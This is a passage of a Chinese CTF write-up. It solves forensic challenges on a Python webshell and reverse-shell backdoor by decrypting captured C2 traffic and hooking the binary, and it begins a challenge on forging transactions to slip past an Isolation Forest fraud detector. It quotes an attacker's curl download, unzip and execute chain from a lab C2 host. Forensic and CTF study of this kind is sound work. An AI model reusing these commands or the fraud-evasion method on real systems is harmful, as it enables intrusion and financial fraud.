1flag{v1p3r_5tr1k3_k3y}

SnakeBackdoor-4

Challenge

攻击者上传了一个二进制后门，请写出木马进程执行的本体文件的名称，结果提交形式：flag{xxxxx}，仅写文件名不加路径

Solution

根据上面后门指定了 X-Token-Auth，直接搜索 3011aa21232beb7504432bfa90d32779

后门用的加密算法是rc4，这是个对称密码，直接在原脚本的基础上改改就能得到解密脚本了：

python

1import binascii2 3RC4_SECRET = b'v1p3r_5tr1k3_k3y'4def rc4_crypt(data: bytes, key: bytes) -> bytes:5        S = list(range(256))6        j = 07        for i in range(256):8                j = (j + S[i] + key[i % len(key)]) % 2569                S[i], S[j] = S[j], S[i]10        i = j = 011        res = bytearray()12        for char in data:13                i = (i + 1) % 25614                j = (j + S[i]) % 25615                S[i], S[j] = S[j], S[i]16                res.append(char ^ S[(S[i] + S[j]) % 256])17        return bytes(res)18 19def decrypt(enc_hex_cmd):20    enc_cmd = binascii.unhexlify(enc_hex_cmd)21    cmd = rc4_crypt(enc_cmd, RC4_SECRET).decode('utf-8', errors='ignore')22    print(cmd) 23 24enc = ["a6bc",25       "bab1771fe3c167d904976a6971c1ba420d2151ab686ad6587751128712c88b46cbb73456445438",26       "a3ab330fb285",27       "bbb76743bfc926806187313e6edaf3074f245be4272bdf0a7f4c09d210d4d902c3e56f09094b120c0a092b8395aa713f7e718a69f5ae21c064256dc241a6b724a9aea3b216203e5a10f10eb13dd1edd3624db3f5654c99ff4765bb03a3a2146e29e2d2da1e573b22c81b0c52cfab219eccc668859e3bd14eab1aefc4ca669b52ea8226e7ef0c3c4cfc1b21d020c27df0a3c971ddf8fd045cf3f48bc8d7cee145c35da234effb63f0ef6c5ef1b4d17a70f304e97a24673b19854a68b986e4b09ba100994c8458ee27512ae609837ea44298e9807c3bb6425595741cee0dbfff85595cbc40a6ac4aee97d90dca171b19f76029b327b04f5533f3b88fe396d51235a1de8905931f13f9d60ebedd2ed372cc09951426dd495c5dbda222ea8830d99f1fb4c697d3e86ccab948282df14b99156b90904ac8dbe9fae55b52ef408ebe703884216be721280208e0e0082482add6b32472dd3b6eb5f931eec8d0d349a6c4f76482bc24b2db10b4",28       "acad614ef3d82c8445d275713899f04d0d3819fc3726cf57634b189e0e95cc1f93e57656105246251f453a8396a43a6534",29       "",30       "bab6694ba3c938e64b8d257b7cccee460f6347f4363ed21c300c099f129b99028eb57408024e1c32061a",31       "8eaa704aba9f708c4bc36c3d7bd8f14e0f3a0dbe6e6ef558304a13940edac21f8da261191f095f38401963d4c9e6602c64649f69fb846592337d3f9533",32       "a2ae330da7846599188b26257a88f10b50790cb47e6a97177e1053c351",33       "",34       "acb07e4db7c93ece4bcc37246687ae0649614caa3430ce4b",35       "",36       "e0ac7e52fc996cc2038c2d7a3899ed",37       ""]38for e in enc:39    decrypt(e)

解出的结果是：

bash

1id2uid=0(root) gid=0(root) groups=0(root)3 4ls -al5total 366drwxr-xr-x  5 root root  4096 Dec 20 13:55 .7drwxrwxrwt 18 root root 12288 Dec 21 00:00 ..8-rw-r--r--  1 root root  2284 Dec 20 13:55 app.py9-rw-r--r--  1 root root    11 Dec 20 13:55 requirements.txt10drwxr-xr-x  2 root root  4096 Dec 20 13:55 static11drwxr-xr-x  2 root root  4096 Dec 20 13:55 templates12drwxr-xr-x  5 root root  4096 Dec 20 13:55 venv13 14curl 192.168.1.201:8080/shell.zip -o /tmp/123.zip15 16unzip -P nf2jd092jd01 -d /tmp /tmp/123.zip17Archive:  /tmp/123.zip18  inflating: /tmp/shell19 20mv /tmp/shell /tmp/python3.1321 22chmod +x /tmp/python3.1323 24/tmp/python3.13

FLAG

text

1flag{python3.13}

SnakeBackdoor-5

Challenge

请提取驻留的木马本体文件，通过逆向分析找出木马样本通信使用的加密密钥（hex，小写字母），结果提交形式：flag{[0-9a-f]+}

Solution

吃了不会逆向的亏，这一问没做出来连带着下一问也做不出来

先用 DIE 查壳

没有壳，是个 ELF 程序

分析木马的主入口点

这是一个加密的反弹 shell，C2 地址是 192.168.1.201:58782，协议是 TCP

sub_18ED 的作用是使用 TCP socket 接收函数（recv）循环读取数据

程序没有硬编码加密密钥，而是采用了一种基于 PRNG 的动态密钥生成方案

这里的 command_ 是网络字节序，因此在获取 command_ 后要对其转换字节序，将主机字节序的结果存入 seed：seed = (command_ >> 8) & 0xFF00 | (command_ << 8) & 0xFF0000 | (command_ << 24) | HIBYTE(command_);

用 seed 初始化随机数生成器后连续调用4次 rand()，生成了 4 个 32 位整数然后把它们存在数组 v8 里

根据前面逆向的结果回到流量数据包寻找那个四字节的种子，构造以下规则筛选符合要求的流量（来自 192.168.1.201:58782 的长度为 4 字节的 TCP 流量）

text

1(ip.src == 192.168.1.201 && tcp.port == 58782) && tcp.len == 4

第一条结果就是程序接收到的种子 34952046
拿到种子后就可以还原加密密钥了

前面第 40 行的代码之所以需要转换字节序是因为它通过 Socket 接收到的是大端序的原始字节流，直接被小端序架构的 CPU 读取时会发生内存解释错误，因此需要将字节序调整为 CPU 能正确理解的主机序；人工提取直接把数据的逻辑数值作为整型常量定义即可，编译器在编译时会自动处理该数值在当前架构下的内存布局（也就是自动存为小端序）。

1#include <stdio.h>2#include <stdlib.h>3#define HIBYTE(x) (((x) >> 24) & 0xFF)4 5int main() {6    unsigned int seed = 0x34952046;7 8    srand(seed);9 10    for (int i = 0; i <= 3; i++) {11        unsigned int r = rand();12        unsigned char *ptr = (unsigned char *)&r;13        for (int j = 0; j < 4; j++) {14            printf("%02x", ptr[j]);15        }16    }17 18    return 0;19}

Windows 的 rand() 和 Linux 的实现不同，木马是在 Linux 编译的所以这里在 kali 编译运行

得到加密密钥 ac46fb610b313b4f32fc642d8834b456

FLAG

text

1flag{ac46fb610b313b4f32fc642d8834b456}

SnakeBackdoor-6

Challenge

请提交攻击者获取服务器中的flag。结果提交形式：flag{xxxx}

Solution

赛后看了好久 SM4 还是看不懂，不用理解加密算法解题的方法比较常见的应该就是动调和 hook 了，然而我也不会动调，还是在 AI 的帮助下学学怎么 hook 吧

因为前面拿到的很多数据都是十六进制字符串，所以先写一个辅助函数来把十六进制字符串转为二进制字节流

1// 将 Hex 字符串转为二进制字节流2void hex_to_bin(const char *hex, unsigned char *bin) {3    size_t len = strlen(hex);4    for (size_t i = 0; i < len; i += 2) {5        sscanf(hex + i, "%2hhx", &bin[i / 2]);6    }7}

继续分析程序主入口点的流程

先看前面就分析过的第 30-34 行，这里判断了如果 connect < 0 （连接失败）就会直接退出，所以要拦截 connect 并让它不小于 0 达到绕过 C2 的效果

双击这里的 connect 去看它是怎么实现的

1int connect(int fd, const struct sockaddr *addr, socklen_t len)2{3  return connect(fd, addr, len);4}

让这里的返回值为 0 即可，得到代码：

1int connect(int fd, const struct sockaddr *addr, socklen_t len) {2    return 0;3}

再看前面分析过的第 41-43 行，这里调用 4 次 rand() 来填充数组 v8，这里不用管随机数是怎么生成的，直接接管 rand() 的返回值，让它返回上一问拿到的 ac46fb610b313b4f32fc642d8834b456

1int rand(void) {2    // 定义变量，确保在多次调用间保持状态3    static unsigned char key_bin[16];4    static int rand_call_count = 0;5    static int inited = 0;6 7    // 第一次调用把 KEY_HEX 转为二进制存入 key_bin8    if (!inited) {9        hex_to_bin(KEY_HEX, key_bin);10        inited = 1;11    }12 13    // 每次调用取出 4 字节作为一个整数返回给 v8[i]14    if (rand_call_count < 4) {15        unsigned int val = *(unsigned int *)&key_bin[rand_call_count * 4];16        rand_call_count++;17        return val;18    }19    return 0;20}

这样在程序执行 v8[i] = rand() 时填入的就是 ac46fb610b313b4f32fc642d8834b456 了

前面分析过 sub_18ED 是 recv 的简单封装

往下翻翻哪里调用了 sub_18ED 大概率就是接收 C2 数据的地方了

第 46 行调用了 sub_18ED，这里读取了一个 4 字节的数据，通过下面的分析可以知道这个是密文长度，把密文长度存入 n4

第 51 行再次调用了 sub_18ED，这里把读取到的长度为 n4 的密文存入了 command

然后后面就是加密的流程了，不需要理解它是怎么加密的，劫持 sub_18ED 之后把密文长度与密文注入即可，但是 sub_18ED 不方便劫持，所以劫持 recv()

先看看 recv() 是咋写的

sub_18ED 被多次调用，根据调用次数让 recv() 返回指定结果

1ssize_t recv(int sockfd, void *buf, size_t len, int flags) {2    static int recv_step = 0; // 记录调用次数3    static unsigned int current_len = 0;4 5    // 握手包6    if (recv_step == 0) {7        memset(buf, 0x41, 4); // 随便给4个字节就行8        recv_step++;9        return 4;10    }11 12    int idx = recv_step - 1;13 14    // 处理完就退出15    if (DATA[idx] == NULL) {16        exit(0);17    }18 19    // 长度20    if (recv_step % 2 != 0) {21        sscanf(DATA[idx], "%x", &current_len);22 23        // 创建4字节缓冲区存储长度值24        unsigned char len_buf[4];25        // 构造网络字节序 n4 = (n4 >> 8) & 0xFF00 | (n4 << 8) & 0xFF0000 | (n4 << 24) | HIBYTE(n4);26        len_buf[0] = (current_len >> 24) & 0xFF; // MSB27        len_buf[1] = (current_len >> 16) & 0xFF;28        len_buf[2] = (current_len >> 8) & 0xFF;29        len_buf[3] = current_len & 0xFF;         // LSB30 31        memcpy(buf, len_buf, 4);32        recv_step++; 33        return 4; 34    }35 36    // 密文37    if (recv_step % 2 == 0) {38        unsigned char *cipher_bin = (unsigned char *)malloc(current_len);39        hex_to_bin(DATA[idx], cipher_bin);40 41        // 将二进制密文数据复制到缓冲区42        memcpy(buf, cipher_bin, current_len);43 44        // 释放临时分配的内存45        free(cipher_bin);46 47        recv_step++;48        return current_len;49    }50 51    return 0;52}

sub_1860 是解密函数，程序将解密后的明文存放在 command 中，紧接着调用 popen(command, "r")，此时明文已经在 command 参数里了

直接拦截 popen()，劫持修改让它输出明文即可

1FILE *popen(const char *command, const char *type) {2    printf("%s\n", command);3    return fopen("/dev/null", "r");4}

为了能让程序稳定地循环解密，这里还需要额外处理 pclose 和 send

在 popen 中返回的是 fopen("/dev/null") 的普通文件流而非真正的进程管道，程序后续调用系统的 pclose 去关闭它时会报错退出；而程序执行完命令后会将结果通过 Socket 回传，但因为前面伪造了 connect，Socket 是无效的，调用 send 会导致 Broken pipe 错误

因此需要把这两个函数也 hook 掉假装一切正常：

1int pclose(FILE *stream) {2    if (stream) fclose(stream);3    return 0;4}5 6ssize_t send(int sockfd, const void *buf, size_t len, int flags) {7    return len;8}

在筛选 (ip.src == 192.168.1.201 && tcp.port == 58782) && tcp.len == 4 后对第一个结果（就是内容是种子的那条流量）追踪流（流 1827）得到密文长度和密文

text

134952046200000010349b351855f211b85bd012f80ce8ed5b340000001052cc5becb37ca595a89445461c6512efc6000000107b863696da0c6bb28da46e09069dd644f800000030987e8faa921f3e67c530f1b6740a9d439794e426716d49f5e949d5d56f81ed54a97f6cc6752fcf7aa408a94e6a59029e7100000001011b7c88bb0d92308a57f83d08a90ae024c12000009201391fc3c4dc278b1afc5636adeca578f3fe37c16fa66fae433d0d7eb331e7926025ad84833f28fc2641bf05e058be36ed06b3ba79fb66a1ae4192c51152e87a1c6abf66f0a1038689d2137f94d6a686b946120ea2d6fbe312786411b701a353ab035de9c7dc81abfa0dfef55c14cd1f99e07cc2bccec85db48d820038d8c1273024cd80f99e761e2dc2ca5f79f97eb5e01c74a7807ba9f29d99338ea1962daba592f2f212ca8686cf37880755f82949cce1e38a7cd2c8f4a79e5a5b640375a94faa0dd2df11225df777845781f0562aab86e09effa9d6254ac8db8853036f680c37d9a047eafd0b65d7b8715cdd7f9becf3046afd113dc0b8b714b002cafc2482c4f240dab7cfa61ea30b3d4595b67563fde635bbd243f3ea8cca3d6bad779161939dd3acd3de84e9f0345f8e4c7b1dd0909922334bbbc0ccd412b8d8216337b515ad84833f28fc2641bf05e058be36ed08c073a5d9d24304eaf50c29d1f3cde1893acc5e4ba171ed4d1474d3f0046208ba565589ace3ecd59e248c22663b789ff5ff9eb73ea4fff8399159d10f689487d553333ce4ec0c0c568a5f532a015a6f1801f0d820a0b8a744b915248b842a2448d9b6d2d0493c7e8a32b86c05a26127a02bbb99ba83f410b1c2b9bbc1b5e39a5558f467eebd32b38a3e208c2534f74b450e412c2ab730ec45b224a2ba5255e24fd831db1d900c8a57967b8ad6993fb3a9b2de1d2d6093eb14a02ddd4cb29275b4cd80f99e761e2dc2ca5f79f97eb5e01ae78b840270ec94dd8eaeb7d15b9b74406f4e96257e0eec382482d4dcfb64257b9e83711e847957323fedb65b189afe150ae2213b7c9d2788dce7ba88cf8774a9bbe15c3832f0c136b1397209a7d6a9f37d3bc0a242f029d6a4feb9b26a55d786120ea2d6fbe312786411b701a353ab0c81a54b98f519ef41ce3775f5b2c26c7ad644797d69604a9fd412ae25a28aec737d3bc0a242f029d6a4feb9b26a55d786120ea2d6fbe312786411b701a353ab0158df499dc5f4de223e3dca72bbf66f48ac1fc75b1be3cc2e4de7d370f88778a006daefea44d62d389eff227e4d031124cd80f99e761e2dc2ca5f79f97eb5e01507836a14c3f3e83d0a317cd2ab8048eba52c6ca5e547ff797fca0cd47c62f4b7356b3bc38bc81e646000cf069b2be56d9fe59bcf4063d0a0363b9209c4f3860c90967283e1b364810145ed6e7525074a1a2527c05163cd8d49595c493a9bc5e5d480f143d8f892dfd8f90b3e8d3ea20352c9d0ad901cc079bf2a592ae4c58be125fff2fb31ecdcd95dc2fcdefdf1c6101dabec17b13f2d04eb8851a3115be66d1778dfb4003a9f705ad133b196c32404734c892cda46767181cf7a0a38fb8ac6e0a04a6bff4b1e8a7bfdabe5ddabbf62f934f8f91898a41dd0a0fd7c83eb55d27fe795766e9fcf20b8b885081848690e58d3748a157c7801a3d5c42db28cebf582760ac945ac0fc2b72edfc43c01c919b5a749a422da155198cbe9e3a2806a32a4e4a8590bbcf0496b0e13a8be7fbb69d55fc3541905d448499cd88edf0c58f59205e9f89a115e0ca9b5c3ebd9415c631acc7f6b9de54a40a9fa7d606f95e4cd62cd0cb2eb4feb350d04c46ce6f8b8d0eaf46208b3b4d4508812cd908bce78846ad5c20a6dbb14f7373dfce61976b85e58d3748a157c7801a3d5c42db28cebf75ec1d1089052336e2c805f6e1d401dc35b7bb0bf188e8a9c2e8567a3ae0ec3bf6b9c05a0b6a9673c89693fbe7894b0135481fbddaf394773fad605eae99f4600e956dd8d489eb2ed159c598fabec5b17c8df9c4b414a371aa84b77eefea1bb42418ea7fd3709e2ef4850ddae503e92a0b4ff34aa7020c999bac051005b26fa5a0f828b51e588aeca3e690e9c84ff682164a86379ddda02b1d92f0dee9a1d0cb9cbdf5432cc4b943ba474c4f5467500b0b31d077cf5047aa9384cf4b6757ca370a5e0604fcd15bfedaefe87179f97cf0efe63431c3b3540eb2e459cb8250fc1993bea701c61b61b7ffc13777b2d9f9dc57d229f0489d6328140f8e8c73baeb70cada6aa30d3a91d0c8f4f2a26dd4e3e7ad0c99810245ae92a05893d4b74323a37247cc6c9c417f8082ccef101bd31acdc79c8a673396353a030358d2a3db37019672b8042929a68fea5ba9965e5145940355e00debe46e80b75dd31b646f39d4cb3e057bc64c8e3b39a7c6d3bfdd41a836ff87620ec931e8a490f0ad33048de50841a959f4baac6fb0e36b389f6f5ecb3925b04a5d37f37479c0ed02b23f38c64e44300433b5a0cbc4063760642bba08473e11ef2c7be2f6bc0ac99cca4792b17dfe4f3358455566bb4e3006a200a87466f4dafea0bfa7a420220ca5ec4f5e73d89784fce2cfc878df8f3609576975a58ce58d3748a157c7801a3d5c42db28cebf152ab441a154dfbd83e6e929e62be820e41688e06d47bde780960ef807b3fd78bdf05032d4aa84948b384d9afd9fc12c95169f9ee5c386f60e32374951be448e92d4853b4c8ae7fbc715f4562156ba86b5adc49e400e7c227c617a26bbd908a27896015cf6f8532e5c04b5030abe4f7f0f6c167ab0ea204e76fdfca5e6311fee6403bb60415e43af2a10de078a479a8c644709a3082176ffb04af8535796b3acf83bcd500f288a491101dcea576f1dd97ba6ce01d8f1de4e98135bf20f394129672538325aaded45fd604b388019b12df57ff11b010ba7c39dc7f04fd26b770806b46d91016bd16e126c8d3f6c874acfe42ee6bc7030e24c62e9901103458ebd44fced6e5064c2f19da84dfff4c62f6c1088c3bc411ab9ab0f7eb772b85958d94f1775cb597f36010c045326de15287a5ee634e93ce07e0ad0ea5c9cebc60308823d603ef85287de24fb532cbc577b8fd49553f3ca6067dd2b58467a749571247d6c20d005178494c3c9ec028297a8360248ecd4a8d4a9088a0b27faba386dca644709a3082176ffb04af8535796b3ac02f30c6c0d7cc594e2bcafb487e74f12157ce37c1553c6382b1689c659eaeb23672538325aaded45fd604b388019b12df57ff11b010ba7c39dc7f04fd26b770804245b989b54cced122e6e9e9551efd011a479cd8db04b5fdcdb0cb75ba0039c44fced6e5064c2f19da84dfff4c62f6c5f4161bc70501782795e73b2032071d9a205839af1b4b42d35f628f79847bf3cd80c3faa03cab06d8cbeae800ce724a7823d603ef85287de24fb532cbc577b8fa014e820aedef4bbd9685845951995982ccf1a4cef2497d36c1dd18bd968932e5e197f709a77d04aa112373cc4c1d0ab1500000030164331cfda21eeab8922fcc7acced16d1a17b02e8d2d9dfee48dc8f18e0dbbb2e4c4547e39d8c4aa2418d9fca52c9c47701700000030187f4b0ef4806983f164af6f46b71d3fce1e3c0bd00c4dd162b72c156f0f3aecd2afcabf551e08380db6fd20316f8a2729190000003020de7cc756e5c97fed18a72a95af102dac48dc0810752bd7755157e5909974cbe0ce87241e7f01e3169e7a763a220080292100000010227b82a7a9e2cacaa29b6e70cec2a3302a230000001024f958a8cea6721e88d1882e0f16e4da4b2500000010267b82a7a9e2cacaa29b6e70cec2a3302a

然后拼起来得到完整的 hook 代码：

1#include <stdio.h>2#include <stdlib.h>3#include <string.h>4#include <sys/socket.h>5 6const char *KEY_HEX = "ac46fb610b313b4f32fc642d8834b456";7 8// 流量包捕获的密文长度和密文9const char *DATA[] = {10    "00000010", 11    "49b351855f211b85bd012f80ce8ed5b3",12    "00000010", 13    "2cc5becb37ca595a89445461c6512efc",14    "00000010", 15    "b863696da0c6bb28da46e09069dd644f",16    "00000030", 17    "87e8faa921f3e67c530f1b6740a9d439794e426716d49f5e949d5d56f81ed54a97f6cc6752fcf7aa408a94e6a59029e7",18    "00000010", 19    "b7c88bb0d92308a57f83d08a90ae024c",20    "00000920", 21    "91fc3c4dc278b1afc5636adeca578f3fe37c16fa66fae433d0d7eb331e7926025ad84833f28fc2641bf05e058be36ed06b3ba79fb66a1ae4192c51152e87a1c6abf66f0a1038689d2137f94d6a686b946120ea2d6fbe312786411b701a353ab035de9c7dc81abfa0dfef55c14cd1f99e07cc2bccec85db48d820038d8c1273024cd80f99e761e2dc2ca5f79f97eb5e01c74a7807ba9f29d99338ea1962daba592f2f212ca8686cf37880755f82949cce1e38a7cd2c8f4a79e5a5b640375a94faa0dd2df11225df777845781f0562aab86e09effa9d6254ac8db8853036f680c37d9a047eafd0b65d7b8715cdd7f9becf3046afd113dc0b8b714b002cafc2482c4f240dab7cfa61ea30b3d4595b67563fde635bbd243f3ea8cca3d6bad779161939dd3acd3de84e9f0345f8e4c7b1dd0909922334bbbc0ccd412b8d8216337b515ad84833f28fc2641bf05e058be36ed08c073a5d9d24304eaf50c29d1f3cde1893acc5e4ba171ed4d1474d3f0046208ba565589ace3ecd59e248c22663b789ff5ff9eb73ea4fff8399159d10f689487d553333ce4ec0c0c568a5f532a015a6f1801f0d820a0b8a744b915248b842a2448d9b6d2d0493c7e8a32b86c05a26127a02bbb99ba83f410b1c2b9bbc1b5e39a5558f467eebd32b38a3e208c2534f74b450e412c2ab730ec45b224a2ba5255e24fd831db1d900c8a57967b8ad6993fb3a9b2de1d2d6093eb14a02ddd4cb29275b4cd80f99e761e2dc2ca5f79f97eb5e01ae78b840270ec94dd8eaeb7d15b9b74406f4e96257e0eec382482d4dcfb64257b9e83711e847957323fedb65b189afe150ae2213b7c9d2788dce7ba88cf8774a9bbe15c3832f0c136b1397209a7d6a9f37d3bc0a242f029d6a4feb9b26a55d786120ea2d6fbe312786411b701a353ab0c81a54b98f519ef41ce3775f5b2c26c7ad644797d69604a9fd412ae25a28aec737d3bc0a242f029d6a4feb9b26a55d786120ea2d6fbe312786411b701a353ab0158df499dc5f4de223e3dca72bbf66f48ac1fc75b1be3cc2e4de7d370f88778a006daefea44d62d389eff227e4d031124cd80f99e761e2dc2ca5f79f97eb5e01507836a14c3f3e83d0a317cd2ab8048eba52c6ca5e547ff797fca0cd47c62f4b7356b3bc38bc81e646000cf069b2be56d9fe59bcf4063d0a0363b9209c4f3860c90967283e1b364810145ed6e7525074a1a2527c05163cd8d49595c493a9bc5e5d480f143d8f892dfd8f90b3e8d3ea20352c9d0ad901cc079bf2a592ae4c58be125fff2fb31ecdcd95dc2fcdefdf1c6101dabec17b13f2d04eb8851a3115be66d1778dfb4003a9f705ad133b196c32404734c892cda46767181cf7a0a38fb8ac6e0a04a6bff4b1e8a7bfdabe5ddabbf62f934f8f91898a41dd0a0fd7c83eb55d27fe795766e9fcf20b8b885081848690e58d3748a157c7801a3d5c42db28cebf582760ac945ac0fc2b72edfc43c01c919b5a749a422da155198cbe9e3a2806a32a4e4a8590bbcf0496b0e13a8be7fbb69d55fc3541905d448499cd88edf0c58f59205e9f89a115e0ca9b5c3ebd9415c631acc7f6b9de54a40a9fa7d606f95e4cd62cd0cb2eb4feb350d04c46ce6f8b8d0eaf46208b3b4d4508812cd908bce78846ad5c20a6dbb14f7373dfce61976b85e58d3748a157c7801a3d5c42db28cebf75ec1d1089052336e2c805f6e1d401dc35b7bb0bf188e8a9c2e8567a3ae0ec3bf6b9c05a0b6a9673c89693fbe7894b0135481fbddaf394773fad605eae99f4600e956dd8d489eb2ed159c598fabec5b17c8df9c4b414a371aa84b77eefea1bb42418ea7fd3709e2ef4850ddae503e92a0b4ff34aa7020c999bac051005b26fa5a0f828b51e588aeca3e690e9c84ff682164a86379ddda02b1d92f0dee9a1d0cb9cbdf5432cc4b943ba474c4f5467500b0b31d077cf5047aa9384cf4b6757ca370a5e0604fcd15bfedaefe87179f97cf0efe63431c3b3540eb2e459cb8250fc1993bea701c61b61b7ffc13777b2d9f9dc57d229f0489d6328",22    "00000030", 23    "4331cfda21eeab8922fcc7acced16d1a17b02e8d2d9dfee48dc8f18e0dbbb2e4c4547e39d8c4aa2418d9fca52c9c4770",24    "00000030", 25    "7f4b0ef4806983f164af6f46b71d3fce1e3c0bd00c4dd162b72c156f0f3aecd2afcabf551e08380db6fd20316f8a2729",26    "00000030", 27    "de7cc756e5c97fed18a72a95af102dac48dc0810752bd7755157e5909974cbe0ce87241e7f01e3169e7a763a22008029",28    "00000010", 29    "7b82a7a9e2cacaa29b6e70cec2a3302a",30    "00000010", 31    "f958a8cea6721e88d1882e0f16e4da4b",32    "00000010", 33    "7b82a7a9e2cacaa29b6e70cec2a3302a",34    NULL // 结束35};36 37// 将 Hex 字符串转为二进制字节流38void hex_to_bin(const char *hex, unsigned char *bin) {39    size_t len = strlen(hex);40    for (size_t i = 0; i < len; i += 2) {41        sscanf(hex + i, "%2hhx", &bin[i / 2]);42    }43}44 45int connect(int fd, const struct sockaddr *addr, socklen_t len) {46    return 0;47}48 49int rand(void) {50    // 定义变量，确保在多次调用间保持状态51    static unsigned char key_bin[16];52    static int rand_call_count = 0;53    static int inited = 0;54 55    // 第一次调用把 KEY_HEX 转为二进制存入 key_bin56    if (!inited) {57        hex_to_bin(KEY_HEX, key_bin);58        inited = 1;59    }60 61    // 每次调用取出 4 字节作为一个整数返回给 v8[i]62    if (rand_call_count < 4) {63        unsigned int val = *(unsigned int *)&key_bin[rand_call_count * 4];64        rand_call_count++;65        return val;66    }67    return 0;68}69 70ssize_t recv(int sockfd, void *buf, size_t len, int flags) {71    static int recv_step = 0; // 记录调用次数72    static unsigned int current_len = 0;73 74    // 握手包75    if (recv_step == 0) {76        memset(buf, 0x41, 4); // 随便给4个字节就行77        recv_step++;78        return 4;79    }80 81    int idx = recv_step - 1;82 83    // 处理完就退出84    if (DATA[idx] == NULL) {85        exit(0);86    }87 88    // 长度89    if (recv_step % 2 != 0) {90        sscanf(DATA[idx], "%x", &current_len);91 92        // 创建4字节缓冲区存储长度值93        unsigned char len_buf[4];94        // 构造网络字节序 n4 = (n4 >> 8) & 0xFF00 | (n4 << 8) & 0xFF0000 | (n4 << 24) | HIBYTE(n4);95        len_buf[0] = (current_len >> 24) & 0xFF; // MSB96        len_buf[1] = (current_len >> 16) & 0xFF;97        len_buf[2] = (current_len >> 8) & 0xFF;98        len_buf[3] = current_len & 0xFF;         // LSB99 100        memcpy(buf, len_buf, 4);101        recv_step++; 102        return 4; 103    }104 105    // 密文106    if (recv_step % 2 == 0) {107        unsigned char *cipher_bin = (unsigned char *)malloc(current_len);108        hex_to_bin(DATA[idx], cipher_bin);109 110        // 将二进制密文数据复制到缓冲区111        memcpy(buf, cipher_bin, current_len);112 113        // 释放临时分配的内存114        free(cipher_bin);115 116        recv_step++;117        return current_len;118    }119 120    return 0;121}122 123FILE *popen(const char *command, const char *type) {124    printf("%s\n", command);125    return fopen("/dev/null", "r");126}127 128int pclose(FILE *stream) {129    if (stream) fclose(stream);130    return 0;131}132 133ssize_t send(int sockfd, const void *buf, size_t len, int flags) {134    return len;135}

bash

1gcc -fPIC -shared -o hook.so hook.c -ldl2LD_PRELOAD=./hook.so ./shell

不过这里要注意的是出题人互换了 1 和 l、0 和 O，需要手动改回来（好阴啊）

FLAG

text

1flag{6894c9ec-719b-4605-82bf-4fe1de27738f}

AI安全

The Silent Heist

Challenge

目标银行部署了一套基于 Isolation Forest (孤立森林) 的反欺诈系统。该系统不依赖传统的黑名单，而是通过机器学习严密监控交易的 20 个统计学维度。系统学习了正常用户的行为模式（包括资金流向、设备指纹的协方差关系等），一旦发现提交的数据分布偏离了“正常模型”，就会立即触发警报。

我们成功截取了一份包含 1000 条正常交易记录的流量日志 (public_ledger.csv)。请你利用统计学方法分析这份数据，逆向推导其多维特征分布规律，并伪造一批新的交易记录。

Solution

孤立森林是一种非参数化的异常检测算法，其核心思想是异常点往往稀少且不同。异常点远离高密度区域，在树中很快就会被孤立，路径长度较短；正常点处于高密度聚集区，要经过多次切分才能被孤立，路径长度较长。

先分析 public_ledger.csv 的统计特性：

python

1import pandas as pd2df = pd.read_csv('public_ledger.csv')3print(df.describe())4print(df.corr())

输出结果如下：

yaml

1                f0           f1           f2           f3  ...          f16          f17          f18          f192count  1000.000000  1000.000000  1000.000000  1000.000000  ...  1000.000000  1000.000000  1000.000000  1000.0000003mean    353.366066    27.518295    93.723774    82.976145  ...    31.057835    43.039691    14.267126    29.5046234std      25.761303     2.727274     2.828509     2.690375  ...     2.574662     2.468624     2.808017     2.1371935min     277.528901    19.139613    85.223702    75.070764  ...    22.914408    35.168580     5.381082    23.436739625%     335.406619    25.651252    91.867704    81.171030  ...    29.230476    41.424166    12.347197    28.079182750%     353.419892    27.557481    93.661490    82.935950  ...    31.025311    42.978489    14.239108    29.508814875%     370.928230    29.404009    95.605310    84.894005  ...    32.874875    44.669082    16.365519    31.0468819max     431.299163    35.577185   102.853029    90.399800  ...    39.317027    50.426151    23.295685    36.21432810 11[8 rows x 20 columns]12           f0        f1        f2        f3        f4  ...       f15       f16       f17       f18       f1913f0   1.000000  0.750063  0.716637  0.759383  0.507360  ...  0.821064  0.703803  0.702949  0.830558  0.79462014f1   0.750063  1.000000  0.806308  0.704578  0.689826  ...  0.749549  0.736088  0.696779  0.779997  0.58174715f2   0.716637  0.806308  1.000000  0.671494  0.614247  ...  0.694812  0.716734  0.773410  0.682263  0.66223816f3   0.759383  0.704578  0.671494  1.000000  0.725941  ...  0.890735  0.673606  0.728218  0.788946  0.69214817f4   0.507360  0.689826  0.614247  0.725941  1.000000  ...  0.697393  0.680010  0.491486  0.552296  0.47789518f5   0.662030  0.734213  0.810812  0.710760  0.553893  ...  0.629712  0.773858  0.697300  0.762147  0.68518019f6   0.787701  0.730347  0.764020  0.718250  0.612411  ...  0.674097  0.678779  0.801436  0.745377  0.70801720f7   0.700495  0.724452  0.671756  0.661123  0.674914  ...  0.759921  0.719829  0.561439  0.846569  0.58205021f8   0.636828  0.728840  0.795659  0.786771  0.796218  ...  0.723262  0.765611  0.835049  0.709286  0.58092622f9   0.843381  0.785895  0.708344  0.725701  0.620199  ...  0.778569  0.858284  0.718543  0.907205  0.71741623f10  0.757026  0.763784  0.726032  0.851975  0.699480  ...  0.744315  0.746124  0.805886  0.761826  0.71843524f11  0.705224  0.778396  0.779770  0.789787  0.668275  ...  0.747641  0.800492  0.839851  0.810376  0.69168625f12  0.702653  0.767262  0.802256  0.782943  0.838507  ...  0.739345  0.755160  0.740916  0.690307  0.63536926f13  0.789366  0.837702  0.832103  0.729791  0.587619  ...  0.831766  0.740468  0.800123  0.813361  0.70977827f14  0.682876  0.760312  0.798318  0.660775  0.647816  ...  0.796049  0.692311  0.592889  0.618375  0.68228428f15  0.821064  0.749549  0.694812  0.890735  0.697393  ...  1.000000  0.708625  0.680482  0.817315  0.72473329f16  0.703803  0.736088  0.716734  0.673606  0.680010  ...  0.708625  1.000000  0.711181  0.745379  0.68966530f17  0.702949  0.696779  0.773410  0.728218  0.491486  ...  0.680482  0.711181  1.000000  0.773676  0.60170431f18  0.830558  0.779997  0.682263  0.788946  0.552296  ...  0.817315  0.745379  0.773676  1.000000  0.70380332f19  0.794620  0.581747  0.662238  0.692148  0.477895  ...  0.724733  0.689665  0.601704  0.703803  1.00000033 34[20 rows x 20 columns]

可以发现 feat_0 的均值在 350 左右，要达到 200 万就要生成大约 6000 条记录。通过相关系数矩阵发现 feat_1 到 feat_19 之间并非完全独立，比如说某些设备指纹特征之间存在强耦合，如果生成的特征破坏了这种协方差关系孤立森林会就会识别出异常。

由于已知数据是正常行为，我们可以假定这些数据服从多元正态分布，其概率密度函数由均值向量和协方差矩阵决定：

